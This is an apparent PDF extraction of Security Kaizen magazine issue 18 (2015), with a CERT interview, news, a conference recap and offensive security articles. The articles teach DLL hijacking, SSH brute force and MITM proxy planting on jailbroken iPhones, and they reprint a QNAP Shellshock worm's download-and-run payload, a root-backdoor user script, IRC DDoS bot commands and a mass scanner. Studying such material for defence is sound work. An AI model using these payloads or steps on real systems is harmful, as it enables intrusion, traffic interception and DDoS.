security kaizen magazine, issue 18

Vol.5 Issue 18 Jan. - Feb. 2015

2015The Best Is Yet To Come

Cairo Security Camp 20145 years of Success

Interview with Badar Ali Al SalehiGeneral Director At OMAN National CERT

www.bluekaizen.org

March 29- 30, 2015

Confirmed Speakers

Organized By

Eng Badar Al Salehi,Director General, Oman National

CERTHead of ITU

Regional Cyber Security Center

Maarten Van Horenbeeck

President at FIRST

Omar Sherin Head of CIIP-Qcert

Georgia Weidman Bulb Security LLC-Founder

Regional Cyber Security Summit 2015

Towards the Future of Cyber Attacks

Muscat,Oman ,Al Bustan Palace

Issue 18 | www.bluekaizen.org | 2

Issue 18 | Securitykaizen Magazine | 3

ww

w.b

luek

aize

n.or

g

Cont

ents

Win32:DarkSeoul-C, Trojan.Win32.EraseMBR.bMalware Review

Manual Source Code ReviewCode Review Review

28

31

AndroidOS_GEINIMI analysis reportMalware Review24

Reviews

Interview with Mr.Badar Ali Al Salehi, General Director – OMAN National CERT Information Technology Authority - ITA

5

New & News

Interviews

71013

16 Bluekaizen NewsDLL Hijacking

Attacking Jailbroken iDevices

NAS Botnet Revealed

20 Cairo Security Camp 2014

19 Regional Cyber Security Summit 2015

Defining a Proactive Security Monitoring Strategy

Information Security Is aChallenge in The Middle East

37

39

Best Practice

Grey Hat


It is customary with each New Year, that everyone set his plans and his resolution with the mere hope of improvement or better yet a new beginning. Usually we are filled with positive feelings and an inner boost that keeps us going till the year’s end.

I will try this year to enter with a more enthusiastic (though it will be hard) approach, I will try not to set the bar real high this time and for this I have to thank everyone who helped me with their words and encouragement, everyone I see fighting and still standing in his area, young geeks with their never ending ideas, and the list goes on…I guess what I am trying to say is, you should all take this as an opportunity to see new possibilities, to see the glass half full, to join a group of positive people and do not let the negative vibes get you. This March, Bluekaizen is contributing in organizing the regional cyber security summit in OMAN with the help of OMAN CERT.

On a different note I want to congratulate Ahmed Mohamed for the hack zone project and hope you can all support him to let his dream comes to life. Those kind of initiates that keeps the positive energy in us

ww

w.b

luek

aize

n.or

g

Edito

r’s

Not

e

For Advertisement In Security Kaizen

Magazine &

www.bluekaizen.org Website

[email protected]

OrPhone: +2 0100 267 5570 +971 5695 40127

Security Kaizen is issued Bi-Monthly

Reproduction in Whole or part without written permission is strictly

prohibitedALL COPYRIGHTS ARE

PRESERVED TOWWW.BLUEKAIZEN.ORG

Chairman & Editor-in-ChiefMoataz Salah

EditorMohamed H.Abdel Akher

ContributorsBK team

Khaled SakrNipun Jaswal Senad Aruc

Ehab Abdel MonemAbdulrahman Hesham

Shaikh Rashid Harris D. Schwartz

Abdul Rehman

Website DevelopmentMariam Samy

Marketing CoordinatorMahitab Ahmed

DistributionAhmed Mohamed

Design Mohamed A.El-Maghraby

Magazine Team

Bluekaizen Founder

Also we are now preparing for the interviews of Bluekaizen Chapters, so if you are interested please fill out the form that should have been published on Bluekaizen Facebook Page. This year we are planning to establish a more solid and organized chapters with clear duties and responsibilities so that we can reach as much people as we can # spread the word #Bluekaizenchapters 2015


ww

w.b

luek

aize

n.or

g

Inte

rvie

ws

Mr. Badar Ali Al SalehiInterview withGeneral Director – OMAN National CERT Information Technology Authority - ITA

Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?

WWW.Bluekaizen.org

My name is Badar Al-Salehi . I am the General Director of Oman National CERT which is the e-Oman national initiative aiming at addressing cyber security risks, Developing local cyber security capabilities within the sultanate of Oman, building cyber security awareness program of public and private sector organizations, Securing critical national infrastructure and key industries within the general public and ICT users.

I joined ITA at the early establishment of this Authority in 2006 and since then I have been working in different national information security and critical infrastructure related projects. I am also a member of different regional and international forums and committees including GCC CERT and OIC-CERT steering committee member and the Oman CERT representative for the Forum of incident response and security teams (FIRST).I am an advisory board member at the college of modern Science and member of the Ministry of manpower Committee reviewing IT curriculum. I have been speaking and panelling at several regional and international ICT and cyber security forums, summits and conferences .Before joining ITA, I was also playing different senior roles at the Sultan Qaboos University and the Municipality of Muscat looking after the critical infrastructures and systems as well as information security where I worked on the first initiative in Oman on establishing an information security management system within the government

BK Team


What is the Regional cyber Security Center? How it is established? And what is its vision and mission?

Towards achieving its goal of safe cyberspace across the globe, The ITU Arab Regional Cyber Security Center (ITU-ARCC) is established by the International Telecommunication Union (ITU) and the Omani Government, represented by the Information Technology Authority through its collaboration with International Multilateral Partnership against Cyber Threats (IMPACT) with a vision of creating a safer and cooperative cybersecurity environment in the Arab Region and strengthening the role of ITU in building confidence and security in the use of information and communication technologies in the region.

In line with the objectives of the ITU Global Cyber security Agenda (GCA), and the ITU-IMPACT initiative, ITU-ARCC will act as ITU’s cybersecurity hub in the region localizing and coordinating cybersecurity initiatives. ITU-ARCC is hosted, managed and operated by Oman National CERT (OCERT). The Centre is designed to cater for the cybersecurity needs of the Arab Region. The Centre was officially launched on the 3rd of March 2013 at the Oman National CERT in Muscat.

What are the main services provided by ARCC?ITU-ARCC services offers a variety of cybersecurity services to meet the difficult challenges of fighting cyber threats and to support the center’s aim. These services align and agree with ITU Global Cybersecurity Agenda (GCA) which intends to enhance the confidence and security in the information society. The GCA was launched on 17th May 2007 for international cooperation and strategies to improve global cybersecurity posture . ITU-ARCC provides the following services:

•Cybersecurity Strategy and Governance •Cybersecurity Assurance & Compliance•Cybersecurity Capacity Building •Emergency Incident Response•Technical Services and Information Sharing full collaboration and sharing information against cyber

What do you think is the greatest achievement for ARCC in 2014?The next years ITU-ARCC will focus on designing and implementing national cybersecurity strategies for Arab countries to achieve significant improvement in the security posture. In addition, ITU-ARCC will conduct and implement cybersecurity measures in region.

What are your wishes for the Arabic region in the Information Security field?The main purpose of ITU-ARCC is to support the member states of Arab Region in developing and improving cybersecurity through the development of sound cybersecurity policies and capabilities, building human capacity, developing related tools, applications, templates, procedures and manuals. ITU-ARCC wishes to uniting and strengthening cybersecurity initiatives and programs to improve cybersecurity posture in Arab region against cyber threat through regional cooperation.

What is the main role of Oman Cert?

OCERT’s mission is to Developing cyber-security capabilities to increase the

capacity of security incident detection and emergency responses to such incidents

and also to ensure, ensure cyber-security awareness in public and private sector organizations, including citizens and

residents

Can you give us more information about the Regional Cyber Security

Summit 2015?

Information Technology Authority represented by Oman National CERT

(OCERT) is hosting the Regional Cyber Security Summit, in cooperation with the International Telecommunication Union

(ITU), IMPACT and Bluekaizen on 29th – 30th of March in Muscat, Oman.

The Regional Cyber security Summit in 2015 focuses on future expected threats and

measures, also aims at connecting public, private and academic sectors with the main

purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss, formulate strategic directions and plans to tackle emerging threats to the global and regional Security sector. The conference is targeting different CERTs in the Arabic

region, Chief Security Officers and strategic positions in different organizations either

from Oman or Arab countries.Security professionals from all over the world

are welcome to submit their talks before 20th of February, if they are interested to present in the fourth version of RCSS For

more information you can check the summit website.

www.regionalcybersecuritysummit.com


ww

w.b

luek

aize

n.or

g

Gre

y H

at

DLL HijackingIntroductionIn this article I would like to discuss DLL Hijacking attack, due to its impact and ease of exploit. The article we will go through the concept of DLL Hijacking, then how to exploit systems using DLL hijacking in simple steps, then will introduce a demo of exploiting a vulnerable program.

Let’s first understand what is DLL and what is it’s usage,a DLL is an abbreviation for Dynamic link library. DLLs are libraries that contain shared functions used by executable files at runtime, as an example an application that displays a MessageBox that says “Simple MessageBox” , what actually happens inside this application that it loaded a built-in DLL called “User32.dll” inside this DLL it executes a function that is calledMessageBoxA (eg.MessageBoxA(0,“Simple MessageBOX”,MB_OK“);(see Figure below).

DLL & DLL Hijacking

Khaled SakrInformation security engineer at security Meter


the flow that the application takes to load a DLL at runtime is first the windows try to locate the DLL location, to achieve this the windows searches a well-defined set of directories in a particular orderas described in DLL Search Order, based on that logic If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory, This is called DLL Hijacking so If the Application does not find the legitimate DLL before searching the compromised directory, it will load the malicious DLL. Like this we can use DLL Hijacking to perform remote code execution or even Privilege escalation if the vulnerable program runs as administrator

DLL Hijacking in a few stepsSo what are the steps to perform a successful DLL hijacking attack?.1.Targeting a certain application.2.Monitoring DLLs that are loaded by this application.3.Find the search order for the DLLs4.Target a DLL where you can put your malicious DLL to run before the legitimate DLL, or better Target an unavailable DLL for example VulnDLL.dll .5.Find out which function this DLL is executing for example executeme()6.Write a code you want to be executed when the DLL loads and put the code inside a function executeme().7.Compile the code to shared library and name it VulnDLL.dll

Let’s Crack Some Systemsin this part I’ll show a Demo on how to perform a successful DLL Hijacking Attack.in this Demo we will target tftp32.exe application. you can find a list of applications reported to be vulnerable to DLL Hijacking On the following link: http://www.exploit-db.com/dll-hijacking-vulnerable-applications/So let’s start the fun part!!!

as discussed we need to get the list of DLLs that get loaded in runtime when the application starts, this can be achieved easily using Procmon.exe tool, so just start your application and add the following filter in procmon,

•Process Name is tftp32.exe•Path ends with DLL These filters will get us all entries related to the process tftp32.exe and all DLL files it’s trying to load so now lets target a DLLwe can notice in the results column in procmon that there are columns that state “NAME NOT FOUND”, which means that the system is trying to load the DLL but it can’t find it so these are the perfect DLL to target. So lets add another filter

•Results Contain NAME NOT FOUNDGreat now we have a smaller list of targetsTo choose from, any one of these DLL’s can Be vulnerable to DLL Hijacking so lets pickOne, for example “IPHLPAPI DLL”

As discussed the application load the DLL to execute a function existing inside this DLL , so now the next step, we have to figure out which function inside this DLL the application needs, with a little bit of reversing using IDA we can obtain this information, I was able to get the function name using static reversing only, in some other cases you will need to reverse the application in run time to obtain the function name, now lets start reversing.


As discussed the application load the DLL to execute a function existing inside this DLL , so now the next step, we have to figure out which function inside this DLL the application needs, with a little bit of reversing using IDA we can obtain this information, I was able to get the function name using static reversing only, in some other cases you will need to reverse the application in run time to obtain the function name, now lets start reversing.

In case of this application it will be very trivial just load the application with IDA•open the “strings” subview and search for the Target DLL IPHLPAPI DLL(see Figure below)

•double click on it so it gives you reference to where it’s used in the assembly code (see Figure below).

we can see that a string was defined by the value “IPHLPAPI.DLL” (db ‘“IPHLPAPI.DLL”)we can see where this string value is used in the code if we double clicked on DATA XREF: .rdata:004283EC (see figure below).

On the address where the target DLL is referenced we can find that it import a function called SendARP(),we don’t need to know what this function does, we only need to know it’s name.

So as you have all guessed by now the only step remaining is •Write a code we want to get executed when the vulnerable application run•Insert this code inside a function called SendARP(), •Compile this code into a shared library(DLL) and call it IPHLPAPI.DLL” ,• Insert it in a path where the system looks for it and we will get our self a back door or a remote code execution on the system. Just to demonstrate I will write a code that open a MessageBox that displays to the user “DLL Hijacked”, below is a code snippet.

Simple explanation for the code is that when the DLL is called (DLL_PROCESS_ATTACH) , execute SendARP() Function. Finally eachtime the program run this function will get executed.Instead of just opening a message Box you can use this vulnerability to get the victim reverse connect to you and probably get a permanent shell or backdoor on the box ,or even better you can get a Meterpteter session if you insert the right code inside SendARP() function.SummarySo now we know how to exploit DLL hijacking vulnerabilities, what about remediating them? In a few points let’s see some recommended solutionFrom development perspective1.always use fully specified Path name in the C functions LoadLibrary() or LoadLibraryEX()2.Consider removing the current directory from the standard search path by calling the C Function SetDllDirectory with an empty string (“”).From System hardening prespective3.Make sure the registry key SafeDllSearchMode value is set to ‘1’ this places the user’s current directory later in the search order (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode)As a matter of fact the below is not really a complete solution as for some reason Microsoft has a feature “DLL Local Redirection”, where if an application name is abc.exe and you created a folder called “abc.exe.local”, this will force the application to search all DLL it needs from this local folder first even if it was specified using LoadLibraryEX(“Path to DLL”) .So if you think of it, this can make all applications vulnerable to DLL hijacking Attacks.


ww

w.b

luek

aize

n.or

g

Gre

y H

at

Apple based iDevices are continually jail-broken in order to expand service capabilities. However, most of the people do not know the consequences that come alongside. Hackers and Security Enthusiasts can easily breach jail-broken device and can install malicious proxies remotely on the victimized device. Today, we will be discussing the same procedure that hackers use in order to leverage their attacks onto the target device and we will look at the possible vulnerability patch for the same.

Attacking JailbrokeniDevices

Chief Cyber Security Architect

Nipun Jaswal

Introduction


Requirements

In order to carry out this attack efficiently, a hacker would require following tools- -Burp Suite (For Certificate Generation) -WSCP Client (Copying and Downloading files from remote device) -Hydra (Brute Force for SSH) -PList Editor (Editing PList Files)- Putty(Terminal for Remote Device)

Procedure

Most of the people who possess jail-broken iDevices do not know about the open ( ssh) port of the device. Hence, this makes them vulnerable to known password attack or due to the default password that is in most cases is ‘alpine’. However, if the user is little techy and have chosen to change the default password, Hydra-a brute force tool can help you find the correct password of the device. After Logging in through SSH using putty , we can fetch the preferences file of the device located at the following path:/private/var/preferences/SystemConf iguration/preferences.plistUsing WinSCP client , we can download the above file to the system and can view its contents using PList Editor Software

Figure 1 No Proxy Details

Figure 2 Proxy Configuration

We can see that we have- •HTTPEnable=0 •HTTPProxyType=0 •HTTPSEnable=0If we alter these three values above, we can set the proxy configuration on the device automatically.However, if we set HTTPProxyType to 1 it will use the proxy details as type ‘HTTP’ and if we set it to 2 it will use the proxy details as type ‘SOCKS’.Let us modify this configuration file

Altering the above values will result in the following proxy configuration of the device as follows

Figure 3 Automatic Proxy Configuration


Figure 5 Device Properties Before Cert Install

Figure 4 Device before Certificate Install

Figure 6 Device After Copying Cert Files

Figure 7 Device properties after Cert Install

Hence, we can see the proxy details showing up in the manual configuration of the device.

Installing Cert on the deviceWait; to find out the HTTPS/SSL enabled data from applications like twitter, gmail and facebook, we need to install the root CA certificate on the device as well. The locations of certificate details are present at the following path-/private/var/mobile/Library/ConfigurationProfilesLet us see what files are contained in this directory before certificate installation

In addition, the interface does not contain any option for profiles before they are installed

Now what we can do easily is we can install the certificate on our own iDevice using burpsuite and copy its files to this device.

We need four files from /private/var/mobile/Library/ConfirgrationProfiles- •Cert •PayloadDependency.plist •PayloadManifest.plist •ProfileTruth.plistLet us replace these files with the ones from our device as follows

Next, we can respring the device and see if the certificate is installed or not

We can see that Profile is now the part of general properties of the device.Hence, we configured an MITM proxy remotely and the certificate too.Therefore, we can easily capture the device SSL traffic and analyze it for vital pieces of information.

Referenceshttp://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/ http://www.putty.org http://winscp.net/eng/download.php http://plist-editor-for-windows.software.informer.com/ http://portswigger.net/Burp/help/proxy_options_installingCAcert.html


ww

w.b

luek

aize

n.or

g

Gre

y H

at

Nas Botnet RevealedAbout the security researcher

Multiple Certified ISMS Professional with 10-year background in IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Skills include written and verbal communications in 6 different languages. Currently holding a Senior Security Specialist position at Reply s.p.a - Communication Valley - Security Operations Center. Responsible for advanced security operations.

Senad ArucSenior Lead at Security Operations

We present findings in addition to the work in the follow-ing analyses.Worm Backdoors and Secures QNAP Network Storage Deviceshttps://isc.sans.edu/forums/diary/Worm+Backdoors+and+Se-cures+QNAP+Network+Storage+Devices/19061

Shellshock Worm Exploiting Unpatched QNAP NAS Devices https://threatpost.com/shellshock-worm-exploiting-unpatched-qnap-nas-devices/109870

A little ShellShock funhttp://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html


This is what we found, missing pieces from previous researches

the attackers are sending a GET request with Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from Internet, this payload contains a SH script with very clever design logic specially build for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point the attacker is building persistence with autorun.sh script inside the compromised NAS device.

Another interesting founding is that attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this attacker prevents other hackers to own the already hacked NAS device.

Adding a “‘request” user with root privileges into the “passwd” and “shadow” file is classical approach to own a Linux machine. The real aim of this massive hack is, at the script “armgH.cgi” that attacker is downloading and installing into the compromised machine.

This CGI Backdoor prepares the NAS to become an armed device ready for DDOS. The whole attack schematic is design to be continuous with auto pilot mode.So far we managed to detect more than 500+ compromised devices.

à Massive Attack > Deploying Payload > Patching against Shellshock (persistence) > Arming > Deploy the scanner >DetailsAttack Exploit detected from our IDS devices.GET /cgi-bin/authLogin.cgi HTTP/1.1Host: 127.0.0.1User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

500HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 2250Date: Sat, 13 Dec 2014 22:09:42 GMTServer: header”>HTTP Status 404 - /cgi-bin/authLogin.cgi

Payload - Hosted in compromise server!#!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY os=`uname -m` ip=xxx.14.xx.xx #wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh # # fold=/share/MD0_DATA/optware/.xpl/ if [[ “$os” == ‘armv5tel’ ]]; then

wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi sleep 1

Search=”request” Files=”/etc/passwd” if grep $Search $Files; then e c h o “$Search user its just added!” else echo “request:x:0:0:request:/share/homes/admin:/bin/sh” >> /etc/passwd echo ‘request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::’ >> /etc/shadow

#inst patch wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin

#inst scan sfolder=”/share/HDB_DATA/.../” url69=”http://xxx.14.xx.79/run”


Arming the NAS devices for DDOS attacks. Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability.Output from - Reverse engineering analyses.PRIVMSG %s :* .exec <commands> - execute a system commandPRIVMSG %s :* .version - show the current version of botPRIVMSG %s :* .status - show the status of botPRIVMSG %s :* .help - show this help messagePRIVMSG %s :* *** Scan CommandsPRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by youPRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bugPRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes randomPRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bugPRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes randomPRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bugPRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class randomPRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bugPRIVMSG %s :* .stop - stop current operation (scan/dos)PRIVMSG %s :* *** DDos Commands:PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secsPRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86PRIVMSG %s :* .spoof <ip> - set the source address ip spoofPRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooderPRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooderPRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)PRIVMSG %s :* *** IRC Commands:PRIVMSG %s :* .setchan <channel> - set new master channelPRIVMSG %s :* .join <channel> <password> - join bot in selected roomPRIVMSG %s :* .part <channel> - part bot from selected roomPRIVMSG %s :* .quit - kill the current process

Screenshot from hacked NAS device with deployed payload can be controlled via CGI web backdoorhttp://X.X.X.X:8080/cgi-bin/exo.cgi

Mass scanner for Shellshock This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded port scanner to search and hack for other vulnerable Qnap NAS devices.

#!/bin/sh ## xXx@code 3-12-2014 rand=`echo $((RANDOM%255+2))` #url=”” url=”http://1xx.xx.xx.xx/S0.sh” download=”/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n” get=”GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n” ./pnscan -rQDoc -w”$get “-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &


ww

w.b

luek

aize

n.or

g

New

& N

ews

A peek under the hood to the recent security breaches

News

WWW.Bluekaizen.org

ICANN has been hackedThe internet cooperation for assigned names and numbers has been hacked by unknown attackers that allowed them to access some of the organization’s systems. ICANN said

Spoofed emails pretended as internal ICANN communications to its staff members. The link in the emails took the staff to bogus login page, where they provided their usernames and passwords with the keys to their work email accounts.

“We believe a ‘spear phishing’ attack was initiated in late November 2014,” Tuesday’s press release stated. “It involved email messages that were crafted to appear to come from our own domain being sent to members of our staff. The attack resulted in the compromise of the email credentials of several ICANN staff members.” ICANN Said

According to ICANN, The hackers was able to successfully access a number of systems within ICANN, including the Centralized Zone Data System (CZDS), the wiki pages of the ICANN Governmental Advisory Committee (GAC), the domain registration Whois portal, and the ICANN blog.

“Based on our investigation to date, we are not aware of any other systems that have been compromised, and we have confirmed that this attack does not impact any IANA-related systems,” ICANN stated.

BK Team


Google discloses three unpatched security Vulnerabilities in Windows in less than one month

Google Project zero team has found three zero day vulnerabilities in windows. Google project zero team often finds vulnerabilities in different products in different companies and if the team succeeded to find a vulnerability, then it get reported to the affected software vendors within the limit of 90 days. After the deadline of 90 days, Google automatically disclose the vulnerability to the public.

The First Scenario

Google security researcher “ james Forshaw” has discovered a privilege escalation vulnerability in Windows 8.1 that could allow a hacker to modify contents or even to take over victims’ computers completely, leaving millions of users vulnerable.

The Second Scenario

According to Google’s security team, User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because normal user requires administrator privileges to do so.“However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through,” Google said. “Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn’t something that only happens during the initial provisioning of the local profile.” Google said

U.S. and U.K. have announced plans to stage cyber War Games on each other

Thid Scenario

The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks.“The issue is the implementation in CNG.sys doesn’t check the impersonation level of the token when capturing the logon session ID (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session,” James Forshaw says in the post disclosing the vulnerability.“Thisbehaviour of course might be design, however not having been party to the design it’s hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client”.

https://code.google.com/p/google-security-research/issues/detail?id=128

The United States and the U.K. will stage cyber “war games” together, starting this year, to boost both countries’ resistance to cyberattacks, Britain’s government said on 15 of JanuaryThe US and the UK are planning a series of joint war games involving cyber-warriors from either side attacking each other to ramp up their cyberdefences. The FBI and the National Security Agency will be involved, along with Britain’s GCHQ and MI5 intelligence and security agencies.The Two Governments will simulate attacks on banks, financial sectors in London and U.S. and British governments, commercial banks. The U.K. said that there will be more exercises to test the resilience of national infrastructure.The two governments also plan to team up on a new program to train a new generation of “cyber agents,” officials said. The program will fund students from both countries to search cybersecurity for up to six months expected to start in the academic year that begins in 2016Closer co-operation to improve cybersecurityon both sidesdue toconcerns about vulnerabilities in the wake of devastating cyber-attack on Sony Pictures that the U.S. has blamed on North Koreawhich led to the early release of a number of films and publication of embarrassing private correspondence


Chinese Hackers Stole F-35 Data – Snowden Leaks

So far, the F-35 Lightning II JSF is the most expensive defense project in the US history. The fighter aircraft, manufactured by US-based Lockheed Martin, was developed at a cost of around $400 billion (£230 billion).Reports the BBC on the case.

The documents leaked by Snowden also revealed that NSA spying operation on China’s espionage agencies. According to the documents, the NSA hacked into the computer of a senior Chinese military official and stole information about Chinese intelligence targets in the US government and other foreign governments.

Emotet Banking Malware targets German UsersA new variant in the Win32/Emotet family is targeting banking credentials with a new spam email campaign. The emails include fraudulent claims, such as fake phone bills, and invoices from banks or PayPal.Microsoft says

The malware, identified as Emotet, has been discovered by HeungSoo Kang of Microsoft’s Malware Protection Center. The center was able to identify a sample of the spam email message that was written in German, including a link to a compromised website. This indicates that the campaign primarily targeted mostly German-language speakers and banking websites.

Emotet is able to pull credentials from a variety of email programs including Outlook, Mozilla’s Thunderbird and instant messaging programs such as Yahoo messenger and windows live messenger.

On infected machines,Emotet downloads a configuration file which contains a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic.

All the stolen information is sent back to Emotet’s “command and control (C&C) server where it is used by other components to send spam emails to spread the threat,” Kang wrote. “We detect the Emotet spamming component as Spammer:Win32/Cetsiol.A.”

and personal data.. In another incident, the Twitter and YouTube accounts of the U.S. military’s Central Command were compromised earlier by hackers claiming to support the Islamic State militant group.http://www.bbc.com/news/uk-30842597

Edward Snowden, a former NSA employee, releases a document that reveals industrial-scale cyber-espionage operation of China to learn the secrets of Australia’s next front-line fighter aircraft – the US-built F-35 Joint Strike Fighter (JSF).Chinese spies allegedly stole as much as 50 terabytes of data, including the details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gases and the method the jet uses to track targets. Snowden reveals

http://blogs.technet.com/b/mmpc/archive/2015/01/06/emotet-spam-campaign-targets-banking-credentials.aspx


ww

w.b

luek

aize

n.or

g

New

& N

ews

Regional Cyber Security Summit 2015

Towards the future of cyber AttacksITU Arab Regional Cyber Security Center is organizing

the fourth Regional Cyber Security Summit in cooperation with Bluekaizen. The Information

Technology Authority through Oman National CERT (OCERT) hosts the summit on March 29th – 30th at

Muscat, Oman.

The last decade has demonstrated a significant change to the international security. The rapidly evolving

cyber warfare techniques and emerging threats to government functions, industry, commerce, healthcare,

social communication and personal information, has created a whole new security environment that gets

more dangerous over time. Preparing for future security threats has become

inevitable; security tools and techniques must evolve to better protect the data. The moment we think we

are safe, is the moment we are faced with irrefutable damages.

The Regional Cyber security Summit in 2015 focuses on future expected threats and measures, also aims at connecting public, private and academic sectors with

the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials

from the MENA region to discuss, formulate strategic directions and plans to tackle emerging threats to the

global and regional Security sector.


ww

w.b

luek

aize

n.or

g

New

& N

ews

Cairo Security Camp 20145 years of sharing knowledge

5 years of Success

WWW.Bluekaizen.org

BK Team

The largest information security Conference of its type in The Middle East and North Africa was held in the period of 25th -29th November 2014 gathering IT professionals and security practitioners from throughout the region in order to improve the information security field in the MENA region and to share different views in different information security topics.

After 4 years of holding CSCAMP, The fourth version of CSCAMP2014 was a little bit different. This year we increased the activities to include Job Fair, Security Kaizen Congress, Security awards and others,beside two conference rooms: one of them is only for technical sessions (Security Kaizen Labs room) and the other for different security topics. And as usual a challenge for capture the flag (CTF).


This year the conference included different discussion sessions covering different aspects of information security domain including Malware analysis, forensics, and advanced topic in security and case studies. A set of the remarkable sessions in advanced topics and case studies were presented one of them was presented by Omar sherin, CIIP Manager in Q-CERT, discussing technical challenges and active threats facing the critical infrastructures in different countries through a small practical experiment.

Also a unique session was presented by Tim Willis from Google about debugging the internet.

Another Advanced session was about Mobile forensics which was covered by Adel Abdelmoneim regarding the fundamentals of digital forensics with a special focus on mobile devices, Through many practical examples participants will know how to extract information (Facebook Info, WhatsApp, SMS , Images and EXIF information …Etc) from the suspect device.

Special Training also was held in the period of 25th -27th November about Advanced Android and IOS Hands-on Exploitation that was covered by AseemJakhar,Director, Research, Payatu Technologies http://payatu.com .This training was taking a deep dive into all the components of Android operating system starting right from the ARM assembly, shellcoding, buffer overflows, OS security, App security model, reverse engineering to App security and exploitation.

Mr. Tim Willis


Another interesting topic was “The Usual Rants” which was presented by Aseem Jakhar focusing on simple issues that are plaguing the industry. Common myths and old beliefs which need to change for a better and secure Enterprise world.

A new set of sessions was newly introduced during this year conference which coveredThe Security Challenge facing Banking Electronic Channels introduced by Osama Hiji and Anatomy of the Financial Malware session that was presented By Dr. Ahmed Shosha.

The CTF (Capture the Flag) was a major part in CSCAMP2014. CTF contests was designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. Reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which have been required by prior CTF contests at Cairo Security Camp.

balalaika cr3w team

Mr. Aseem Jakhar

Pre-qualification was based on 4 levels that CTF players were able to procceed within a

time frame of 3 days.The challenges were being divided into several types of challenges as follows:

1-Web2-Exploitation3-Reversing

4-bonus round

Two teams were playing at the final round at Cairo Security Camp. The winning team was balalaika cr3w with a score of 2100 points

and the second winning team was Null with a 1050 points.

As final conclusion the conference this year wasunique in its variety of topics covered specially the financing malwares, also the innovated techniques in threat analysis and forensics were very interestingin introducing hands-on and efforts done in threatanalysis and forensics, Case studies and best practices were also introduced and as every year conferenceadvanced topics and debate sessions that wereintroduced opens new aspects for infosec specialists in Egypt&Arab world.


Win32:DarkSeoul-CTrojan.Win32.EraseMBR.b

Executive Summary

ww

w.b

luek

aize

n.or

g

Revi

ews

Malware Review

This malware deletes the MBR from the hard drives connected to the system, and it deletes files and folders on windows versions newer than XP.The malware doesn’t modify registry to achieve persistence as the infected machine won’t survive the next reboot. There are no net-work actives

AbdELRahman HeshamITI Cyber Security Student


Identification

MD5

SHA256

Detection ratio

0a8032cd6b4a710b1771a080fa09fb87

